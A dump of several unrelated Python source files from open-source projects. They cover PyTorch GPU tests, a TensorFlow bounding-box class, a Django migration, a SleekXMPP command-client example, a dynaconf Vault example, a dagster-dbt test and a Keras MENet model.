self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
py | 7df9f68f572e28eb75ede5c9bcacff4c28c06da5 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Numpy BoxList classes and functions."""
import numpy as np
class BoxList(object):
"""Box collection.
BoxList represents a list of bounding boxes as numpy array, where each
bounding box is represented as a row of 4 numbers,
[y_min, x_min, y_max, x_max]. It is assumed that all bounding boxes within a
given list correspond to a single image.
Optionally, users can add additional related fields (such as
objectness/classification scores).
"""
def __init__(self, data):
"""Constructs box collection.
Args:
data: a numpy array of shape [N, 4] representing box coordinates
Raises:
ValueError: if bbox data is not a numpy array
ValueError: if invalid dimensions for bbox data
"""
if not isinstance(data, np.ndarray):
raise ValueError('data must be a numpy array.')
if len(data.shape) != 2 or data.shape[1] != 4:
raise ValueError('Invalid dimensions for box data.')
if data.dtype != np.float32 and data.dtype != np.float64:
raise ValueError('Invalid data type for box data: float is required.')
if not self._is_valid_boxes(data):
raise ValueError('Invalid box data. data must be a numpy array of '
'N*[y_min, x_min, y_max, x_max]')
self.data = {'boxes': data}
def num_boxes(self):
"""Return number of boxes held in collections."""
return self.data['boxes'].shape[0]
def get_extra_fields(self):
"""Return all non-box fields."""
return [k for k in self.data.keys() if k != 'boxes']
def has_field(self, field):
return field in self.data
def add_field(self, field, field_data):
"""Add data to a specified field.
Args:
field: a string parameter used to specify a related field to be accessed.
field_data: a numpy array of [N, ...] representing the data associated
with the field.
Raises:
ValueError: if the field already exists or the dimensions of the field
data do not match the number of boxes.
"""
if self.has_field(field):
raise ValueError('Field ' + field + ' already exists')
if len(field_data.shape) < 1 or field_data.shape[0] != self.num_boxes():
raise ValueError('Invalid dimensions for field data')
self.data[field] = field_data
def get(self):
"""Convenience function for accesssing box coordinates.
Returns:
a numpy array of shape [N, 4] representing box corners
"""
return self.get_field('boxes')
def get_field(self, field):
"""Accesses data associated with the specified field in the box collection.
Args:
field: a string parameter used to specify a related field to be accessed.
Returns:
a numpy 1-d array representing data of an associated field
Raises:
ValueError: if invalid field
"""
if not self.has_field(field):
raise ValueError('field {} does not exist'.format(field))
return self.data[field]
def get_coordinates(self):
"""Get corner coordinates of boxes.
Returns:
a list of 4 1-d numpy arrays [y_min, x_min, y_max, x_max]
"""
box_coordinates = self.get()
y_min = box_coordinates[:, 0]
x_min = box_coordinates[:, 1]
y_max = box_coordinates[:, 2]
x_max = box_coordinates[:, 3]
return [y_min, x_min, y_max, x_max]
def _is_valid_boxes(self, data):
"""Check whether data fullfills the format of N*[ymin, xmin, ymax, xmin].
Args:
data: a numpy array of shape [N, 4] representing box coordinates
Returns:
a boolean indicating whether all ymax of boxes are equal or greater than
ymin, and all xmax of boxes are equal or greater than xmin.
"""
if data.shape[0] > 0:
for i in range(data.shape[0]):
if data[i, 0] > data[i, 2] or data[i, 1] > data[i, 3]:
return False
return True
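# Minimal usage sketch (added for illustration; not part of the original module). The box
# coordinates and the 'scores' field below are made-up values chosen only to exercise the
# BoxList API defined above.
def _example_boxlist_usage():
  """Builds a small BoxList, attaches a scores field, and reads coordinates back."""
  boxes = np.array([[0.0, 0.0, 0.5, 0.5],
                    [0.1, 0.2, 0.8, 0.9]], dtype=np.float32)
  boxlist = BoxList(boxes)
  boxlist.add_field('scores', np.array([0.9, 0.75], dtype=np.float32))
  y_min, x_min, y_max, x_max = boxlist.get_coordinates()
  return boxlist.num_boxes(), boxlist.get_field('scores'), y_max - y_min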
|
py | 7df9f6f38802672cb78b65cb0e08d4a63bb2be56 | import os
import torch
import pickle
import argparse
import torchvision.utils as vutils
# Path
import os, sys
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
basedir = os.path.dirname(parentdir)
sys.path.append(parentdir)
sys.path.append(basedir)
# Target
from target import get_target, get_target_id, add_target_args
# Model
from model import get_model, get_model_id, add_model_args
from survae.distributions import StandardNormal
###########
## Setup ##
###########
parser = argparse.ArgumentParser()
parser.add_argument('--exp', type=str, required=True)
parser.add_argument('--mcmc', type=str, required=True)
parser.add_argument('--num_samples', type=int, default=64)
parser.add_argument('--nrow', type=int, default=8)
eval_args = parser.parse_args()
torch.manual_seed(0)
exp_path = os.path.join('log', eval_args.exp)
mcmc_path = os.path.join('log', eval_args.exp, eval_args.mcmc)
path_args = os.path.join(exp_path, 'args.pkl')
path_chain = os.path.join(mcmc_path, 'chain.pt')
###############
## Load args ##
###############
with open(path_args, 'rb') as f:
args = pickle.load(f)
####################
## Specify target ##
####################
target = get_target(args)
target_id = get_target_id(args)
##############
## Sampling ##
##############
print('Sampling...')
with torch.no_grad():
theta = torch.load(path_chain) # (C,T,D)
theta = theta[:,-1] # (C,D)
perm = torch.randperm(theta.shape[0])
idx = perm[:eval_args.num_samples]
theta = theta[idx]
imgs = target.vec2img(theta).cpu().float().unsqueeze(1)
############
## Sample ##
############
path_samples = os.path.join(mcmc_path, 'samples.png')
vutils.save_image(imgs, fp=path_samples, nrow=eval_args.nrow)
data_true = (target.img.unsqueeze(0).unsqueeze(0)+1)/2
data_corr = (target.img_corrupted.unsqueeze(0).unsqueeze(0)+1)/2
vutils.save_image(data_true, fp=os.path.join(mcmc_path, 'data_true.png'), nrow=1)
vutils.save_image(data_corr, fp=os.path.join(mcmc_path, 'data_corr.png'), nrow=1)
|
py | 7df9f75f684bc0e8ca4ef3434380449a25e21765 | # Generated by Django 2.0.2 on 2018-02-13 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('epsilon', '0002_auto_20180213_0930'),
]
operations = [
migrations.AlterField(
model_name='tag',
name='status',
field=models.BooleanField(default=True, verbose_name='状态'),
),
]
|
py | 7df9f793e4915975b86c59d638fb70365a75db60 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import sys
import logging
import getpass
from optparse import OptionParser
import sleekxmpp
# Python versions before 3.0 do not use UTF-8 encoding
# by default. To ensure that Unicode is handled properly
# throughout SleekXMPP, we will set the default encoding
# ourselves to UTF-8.
if sys.version_info < (3, 0):
from sleekxmpp.util.misc_ops import setdefaultencoding
setdefaultencoding('utf8')
else:
raw_input = input
class CommandUserBot(sleekxmpp.ClientXMPP):
"""
A simple SleekXMPP bot that uses the adhoc command
provided by the adhoc_provider.py example.
"""
def __init__(self, jid, password, other, greeting):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
self.command_provider = other
self.greeting = greeting
# The session_start event will be triggered when
# the bot establishes its connection with the server
# and the XML streams are ready for use. We want to
# listen for this event so that we can initialize
# our roster.
self.add_event_handler("session_start", self.start)
self.add_event_handler("message", self.message)
def start(self, event):
"""
Process the session_start event.
Typical actions for the session_start event are
requesting the roster and broadcasting an initial
presence stanza.
Arguments:
event -- An empty dictionary. The session_start
event does not provide any additional
data.
"""
self.send_presence()
self.get_roster()
# We first create a session dictionary containing:
# 'next' -- the handler to execute on a successful response
# 'error' -- the handler to execute if an error occurs
# The session may also contain custom data.
session = {'greeting': self.greeting,
'next': self._command_start,
'error': self._command_error}
self['xep_0050'].start_command(jid=self.command_provider,
node='greeting',
session=session)
def message(self, msg):
"""
Process incoming message stanzas.
Arguments:
msg -- The received message stanza.
"""
logging.info(msg['body'])
def _command_start(self, iq, session):
"""
Process the initial command result.
Arguments:
iq -- The iq stanza containing the command result.
session -- A dictionary of data relevant to the command
session. Additional, custom data may be saved
here to persist across handler callbacks.
"""
# The greeting command provides a form with a single field:
# <x xmlns="jabber:x:data" type="form">
# <field var="greeting"
# type="text-single"
# label="Your greeting" />
# </x>
form = self['xep_0004'].makeForm(ftype='submit')
form.addField(var='greeting',
value=session['greeting'])
session['payload'] = form
# We don't need to process the next result.
session['next'] = None
# Other options include using:
# continue_command() -- Continue to the next step in the workflow
# cancel_command() -- Stop command execution.
self['xep_0050'].complete_command(session)
def _command_error(self, iq, session):
"""
Process an error that occurs during command execution.
Arguments:
iq -- The iq stanza containing the error.
session -- A dictionary of data relevant to the command
session. Additional, custom data may be saved
here to persist across handler callbacks.
"""
logging.error("COMMAND: %s %s" % (iq['error']['condition'],
iq['error']['text']))
# Terminate the command's execution and clear its session.
# The session will automatically be cleared if no error
# handler is provided.
self['xep_0050'].terminate_command(session)
self.disconnect()
if __name__ == '__main__':
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options.
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# JID and password options.
optp.add_option("-j", "--jid", dest="jid",
help="JID to use")
optp.add_option("-p", "--password", dest="password",
help="password to use")
optp.add_option("-o", "--other", dest="other",
help="JID providing commands")
optp.add_option("-g", "--greeting", dest="greeting",
help="Greeting")
opts, args = optp.parse_args()
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.jid is None:
opts.jid = raw_input("Username: ")
if opts.password is None:
opts.password = getpass.getpass("Password: ")
if opts.other is None:
opts.other = raw_input("JID Providing Commands: ")
if opts.greeting is None:
opts.greeting = raw_input("Greeting: ")
# Setup the CommandBot and register plugins. Note that while plugins may
# have interdependencies, the order in which you register them does
# not matter.
xmpp = CommandUserBot(opts.jid, opts.password, opts.other, opts.greeting)
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0004') # Data Forms
xmpp.register_plugin('xep_0050') # Adhoc Commands
# If you are working with an OpenFire server, you may need
# to adjust the SSL version used:
# xmpp.ssl_version = ssl.PROTOCOL_SSLv3
# If you want to verify the SSL certificates offered by a server:
# xmpp.ca_certs = "path/to/ca/cert"
# Connect to the XMPP server and start processing XMPP stanzas.
if xmpp.connect():
# If you do not have the dnspython library installed, you will need
# to manually specify the name of the server if it does not match
# the one in the JID. For example, to use Google Talk you would
# need to use:
#
# if xmpp.connect(('talk.google.com', 5222)):
# ...
xmpp.process(block=True)
print("Done")
else:
print("Unable to connect.")
|
py | 7df9f7aa355b20c6089c565ef15749937c7616a1 | from ._version import __version__ |
py | 7df9f7c05d850983dcf0d0ffefc01b48dfda018a | class Solution(object):
def isBipartite(self, graph) -> bool:
# Corner case
if len(graph) == 0:
return True
color = {}
for i in range(len(graph)):
if i not in color:
color[i] = 1
queue = list()
queue.append(i)
while len(queue) > 0:
curr = queue.pop(0)
for g in graph[curr]:
if g not in color:
color[g] = -color[curr]
queue.append(g)
else:
if color[g] == color[curr]:
return False
return True
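# Illustrative usage (added comment, not part of the original solution file);
# the two adjacency lists are the classic LeetCode 785 examples:
# >>> Solution().isBipartite([[1, 3], [0, 2], [1, 3], [0, 2]])
# True
# >>> Solution().isBipartite([[1, 2, 3], [0, 2], [0, 1, 3], [0, 2]])
# False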
|
py | 7df9f7fe8abf5111a949dd9aaa0fb894ed4aea9a | from dynaconf import settings
from dynaconf.loaders.vault_loader import list_envs
print(settings.FOO) # noqa
# >>> 'foo_is_default'
with settings.using_env("dev"):
assert settings.SECRET == "vault_works_in_dev", settings.SECRET
assert settings.FOO == "foo_is_default", settings.FOO
assert settings.SECRET == "vault_works_in_default"
available_envs = list_envs(settings, "dynaconf/")
assert set(available_envs) == set(["default", "dev", "prod"]), available_envs
all_secrets = []
for env in available_envs:
env_settings = settings.from_env(env)
assert env_settings.from_env(env).SECRET == "vault_works_in_{0}".format(
env
)
assert env_settings.FOO == "foo_is_default"
all_secrets.append(env_settings.SECRET)
print(available_envs)
print(all_secrets)
|
py | 7df9f8af15b9b7d7ed2d4374c0bce228689af733 | """
MENet, implemented in Keras.
Original paper: 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,'
https://arxiv.org/abs/1803.09127.
"""
__all__ = ['menet', 'menet108_8x1_g3', 'menet128_8x1_g4', 'menet160_8x1_g8', 'menet228_12x1_g3', 'menet256_12x1_g4',
'menet348_12x1_g3', 'menet352_12x1_g8', 'menet456_24x1_g3']
import os
from keras import layers as nn
from keras.models import Model
from .common import conv2d, conv1x1, conv3x3, depthwise_conv3x3, channel_shuffle_lambda, batchnorm, maxpool2d,\
avgpool2d, is_channels_first, get_channel_axis, flatten
def me_unit(x,
in_channels,
out_channels,
side_channels,
groups,
downsample,
ignore_group,
name="me_unit"):
"""
MENet unit.
Parameters:
----------
x : keras.backend tensor/variable/symbol
Input tensor/variable/symbol.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
side_channels : int
Number of side channels.
groups : int
Number of groups in convolution layers.
downsample : bool
Whether do downsample.
ignore_group : bool
Whether ignore group value in the first convolution layer.
name : str, default 'me_unit'
Unit name.
Returns
-------
keras.backend tensor/variable/symbol
Resulted tensor/variable/symbol.
"""
mid_channels = out_channels // 4
if downsample:
out_channels -= in_channels
identity = x
# pointwise group convolution 1
x = conv1x1(
x=x,
in_channels=in_channels,
out_channels=mid_channels,
groups=(1 if ignore_group else groups),
name=name + "/compress_conv1")
x = batchnorm(
x=x,
name=name + "/compress_bn1")
x = nn.Activation("relu", name=name + "/compress_activ")(x)
x = channel_shuffle_lambda(
channels=mid_channels,
groups=groups,
name=name + "/c_shuffle")(x)
# merging
y = conv1x1(
x=x,
in_channels=mid_channels,
out_channels=side_channels,
name=name + "/s_merge_conv")
y = batchnorm(
x=y,
name=name + "/s_merge_bn")
y = nn.Activation("relu", name=name + "/s_merge_activ")(y)
# depthwise convolution (bottleneck)
x = depthwise_conv3x3(
x=x,
channels=mid_channels,
strides=(2 if downsample else 1),
name=name + "/dw_conv2")
x = batchnorm(
x=x,
name=name + "/dw_bn2")
# evolution
y = conv3x3(
x=y,
in_channels=side_channels,
out_channels=side_channels,
strides=(2 if downsample else 1),
name=name + "/s_conv")
y = batchnorm(
x=y,
name=name + "/s_conv_bn")
y = nn.Activation("relu", name=name + "/s_conv_activ")(y)
y = conv1x1(
x=y,
in_channels=side_channels,
out_channels=mid_channels,
name=name + "/s_evolve_conv")
y = batchnorm(
x=y,
name=name + "/s_evolve_bn")
y = nn.Activation('sigmoid', name=name + "/s_evolve_activ")(y)
x = nn.multiply([x, y], name=name + "/mul")
# pointwise group convolution 2
x = conv1x1(
x=x,
in_channels=mid_channels,
out_channels=out_channels,
groups=groups,
name=name + "/expand_conv3")
x = batchnorm(
x=x,
name=name + "/expand_bn3")
if downsample:
identity = avgpool2d(
x=identity,
pool_size=3,
strides=2,
padding=1,
name=name + "/avgpool")
x = nn.concatenate([x, identity], axis=get_channel_axis(), name=name + "/concat")
else:
x = nn.add([x, identity], name=name + "/add")
x = nn.Activation("relu", name=name + "/final_activ")(x)
return x
def me_init_block(x,
in_channels,
out_channels,
name="me_init_block"):
"""
MENet specific initial block.
Parameters:
----------
x : keras.backend tensor/variable/symbol
Input tensor/variable/symbol.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
name : str, default 'me_init_block'
Block name.
Returns
-------
keras.backend tensor/variable/symbol
Resulted tensor/variable/symbol.
"""
x = conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=3,
strides=2,
padding=1,
use_bias=False,
name=name + "/conv")
x = batchnorm(
x=x,
name=name + "/bn")
x = nn.Activation("relu", name=name + "/activ")(x)
x = maxpool2d(
x=x,
pool_size=3,
strides=2,
padding=1,
name=name + "/pool")
return x
def menet(channels,
init_block_channels,
side_channels,
groups,
in_channels=3,
in_size=(224, 224),
classes=1000):
"""
MENet model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,'
https://arxiv.org/abs/1803.09127.
Parameters:
----------
channels : list of list of int
Number of output channels for each unit.
init_block_channels : int
Number of output channels for the initial unit.
side_channels : int
Number of side channels in a ME-unit.
groups : int
Number of groups in convolution layers.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
input_shape = (in_channels, 224, 224) if is_channels_first() else (224, 224, in_channels)
input = nn.Input(shape=input_shape)
x = me_init_block(
x=input,
in_channels=in_channels,
out_channels=init_block_channels,
name="features/init_block")
in_channels = init_block_channels
for i, channels_per_stage in enumerate(channels):
for j, out_channels in enumerate(channels_per_stage):
downsample = (j == 0)
ignore_group = (i == 0) and (j == 0)
x = me_unit(
x=x,
in_channels=in_channels,
out_channels=out_channels,
side_channels=side_channels,
groups=groups,
downsample=downsample,
ignore_group=ignore_group,
name="features/stage{}/unit{}".format(i + 1, j + 1))
in_channels = out_channels
x = nn.AvgPool2D(
pool_size=7,
strides=1,
name="features/final_pool")(x)
x = flatten(x)
x = nn.Dense(
units=classes,
input_dim=in_channels,
name="output")(x)
model = Model(inputs=input, outputs=x)
model.in_size = in_size
model.classes = classes
return model
def get_menet(first_stage_channels,
side_channels,
groups,
model_name=None,
pretrained=False,
root=os.path.join('~', '.keras', 'models'),
**kwargs):
"""
Create MENet model with specific parameters.
Parameters:
----------
first_stage_channels : int
Number of output channels at the first stage.
side_channels : int
Number of side channels in a ME-unit.
groups : int
Number of groups in convolution layers.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
layers = [4, 8, 4]
if first_stage_channels == 108:
init_block_channels = 12
channels_per_layers = [108, 216, 432]
elif first_stage_channels == 128:
init_block_channels = 12
channels_per_layers = [128, 256, 512]
elif first_stage_channels == 160:
init_block_channels = 16
channels_per_layers = [160, 320, 640]
elif first_stage_channels == 228:
init_block_channels = 24
channels_per_layers = [228, 456, 912]
elif first_stage_channels == 256:
init_block_channels = 24
channels_per_layers = [256, 512, 1024]
elif first_stage_channels == 348:
init_block_channels = 24
channels_per_layers = [348, 696, 1392]
elif first_stage_channels == 352:
init_block_channels = 24
channels_per_layers = [352, 704, 1408]
elif first_stage_channels == 456:
init_block_channels = 48
channels_per_layers = [456, 912, 1824]
else:
raise ValueError("The {} of `first_stage_channels` is not supported".format(first_stage_channels))
channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)]
net = menet(
channels=channels,
init_block_channels=init_block_channels,
side_channels=side_channels,
groups=groups,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import download_model
download_model(
net=net,
model_name=model_name,
local_model_store_dir_path=root)
return net
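# Worked example of the channel construction above (illustrative comment, not in
# the original source): for first_stage_channels=228, channels_per_layers is
# [228, 456, 912] and layers is [4, 8, 4], so
# channels == [[228]*4, [456]*8, [912]*4],
# i.e. one list per stage with a constant width repeated once per unit.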
def menet108_8x1_g3(**kwargs):
"""
108-MENet-8x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=108, side_channels=8, groups=3, model_name="menet108_8x1_g3", **kwargs)
def menet128_8x1_g4(**kwargs):
"""
128-MENet-8x1 (g=4) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=128, side_channels=8, groups=4, model_name="menet128_8x1_g4", **kwargs)
def menet160_8x1_g8(**kwargs):
"""
160-MENet-8x1 (g=8) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=160, side_channels=8, groups=8, model_name="menet160_8x1_g8", **kwargs)
def menet228_12x1_g3(**kwargs):
"""
228-MENet-12x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=228, side_channels=12, groups=3, model_name="menet228_12x1_g3", **kwargs)
def menet256_12x1_g4(**kwargs):
"""
256-MENet-12x1 (g=4) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=256, side_channels=12, groups=4, model_name="menet256_12x1_g4", **kwargs)
def menet348_12x1_g3(**kwargs):
"""
348-MENet-12x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=348, side_channels=12, groups=3, model_name="menet348_12x1_g3", **kwargs)
def menet352_12x1_g8(**kwargs):
"""
352-MENet-12x1 (g=8) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=352, side_channels=12, groups=8, model_name="menet352_12x1_g8", **kwargs)
def menet456_24x1_g3(**kwargs):
"""
456-MENet-24x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=456, side_channels=24, groups=3, model_name="menet456_24x1_g3", **kwargs)
def _test():
import numpy as np
import keras
pretrained = False
models = [
menet108_8x1_g3,
menet128_8x1_g4,
menet160_8x1_g8,
menet228_12x1_g3,
menet256_12x1_g4,
menet348_12x1_g3,
menet352_12x1_g8,
menet456_24x1_g3,
]
for model in models:
net = model(pretrained=pretrained)
# net.summary()
weight_count = keras.utils.layer_utils.count_params(net.trainable_weights)
print("m={}, {}".format(model.__name__, weight_count))
assert (model != menet108_8x1_g3 or weight_count == 654516)
assert (model != menet128_8x1_g4 or weight_count == 750796)
assert (model != menet160_8x1_g8 or weight_count == 850120)
assert (model != menet228_12x1_g3 or weight_count == 1806568)
assert (model != menet256_12x1_g4 or weight_count == 1888240)
assert (model != menet348_12x1_g3 or weight_count == 3368128)
assert (model != menet352_12x1_g8 or weight_count == 2272872)
assert (model != menet456_24x1_g3 or weight_count == 5304784)
if is_channels_first():
x = np.zeros((1, 3, 224, 224), np.float32)
else:
x = np.zeros((1, 224, 224, 3), np.float32)
y = net.predict(x)
assert (y.shape == (1, 1000))
if __name__ == "__main__":
_test()
|
py | 7df9f95b0db10b0b7bf3297fe0cd9f9bde67ce3f | import sys, os
from os.path import join
def serializer_paths(project):
return [
{
'template_path': join(os.path.abspath(sys.argv[0][:-12]), 'assets', 'templates', 'serializer', 'user_serializer'),
'filename': 'user_serializer.py',
'output_path': join(project.app_path, 'serializers')
},
{
'template_path': join(os.path.abspath(sys.argv[0][:-12]), 'assets', 'templates', 'serializer', '__init__'),
'filename': '__init__.py',
'output_path': join(project.app_path, 'serializers')
},
] |
py | 7df9f9971878d82af25c79b486141c856292ac66 | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'customers_api.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
py | 7df9f9c0a64f9d987029348d1965704c59ee1dfa | import pickle
from dagster_dbt import DbtCliOutput
from ..test_types import DBT_RESULT_DICT
class TestDbtCliOutput:
def test_init(self):
dco = DbtCliOutput(
command="dbt run",
return_code=0,
raw_output="The raw output (stdout).",
result=DBT_RESULT_DICT,
logs=[],
)
assert len(dco.result["results"]) == len(DBT_RESULT_DICT["results"])
def test_pickle_roundtrip(self): # pylint: disable=unused-argument
dco = DbtCliOutput(
command="dbt run",
return_code=0,
raw_output="The raw output (stdout).",
result=DBT_RESULT_DICT,
logs=[{"some": {"nested": {"logs"}}}, {"other": "log"}],
)
assert vars(pickle.loads(pickle.dumps(dco))) == vars(dco)
|
py | 7df9fa00a95fbd32bce946fcc979c824bf312bab | #!/usr/bin/env python
# Copyright 2018 Division of Medical Image Computing, German Cancer Research Center (DKFZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
